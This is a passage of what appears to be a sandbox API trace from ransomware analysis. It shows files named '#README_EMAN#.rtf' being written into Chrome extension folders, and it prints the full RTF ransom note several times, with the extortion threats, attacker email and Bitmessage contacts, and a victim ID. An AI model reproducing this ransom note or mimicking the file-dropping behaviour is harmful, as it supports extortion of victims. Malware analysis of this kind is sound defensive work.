bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.350] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.351] CloseHandle (hObject=0x294) returned 1 [0272.351] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\#readme_eman#.rtf")) returned 0xffffffff [0272.351] GetLastError () returned 0x2 [0272.351] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.352] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.352] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.352] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 